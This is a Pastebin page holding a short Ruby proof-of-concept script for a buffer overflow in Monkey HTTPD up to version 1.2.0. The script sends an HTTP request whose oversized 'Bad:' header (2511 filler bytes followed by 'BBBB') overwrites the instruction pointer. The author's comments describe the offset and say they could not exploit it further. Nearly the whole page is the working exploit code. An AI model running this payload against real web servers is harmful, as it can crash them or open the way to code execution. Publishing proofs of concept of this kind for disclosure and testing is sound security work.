Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env ruby
- #
- # Demonstrates a buffer overflow in Monkey HTTPD <= 1.2.0
- #
- # The '\r\n' after the Host header seems to be necessary, as well as the
- # 'localhost\r\n' after it. On my system, the offset of 2511 overwrites eip
- # perfectly with 'BBBB'. I wasn't able to exploit this further, but it might
- # be possible.
- require 'socket'
- host = 'localhost'
- port = 2001
- s = TCPSocket.open(host, port)
- buf = "GET / HTTP/1.1\r\n"
- buf << "Host: " + "\r\n"
- buf << "localhost\r\n"
- buf << "Bad: "
- buf << "A" * 2511
- buf << "B" * 4
- buf << "\r\n\r\n\r\n"
- s.puts(buf)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement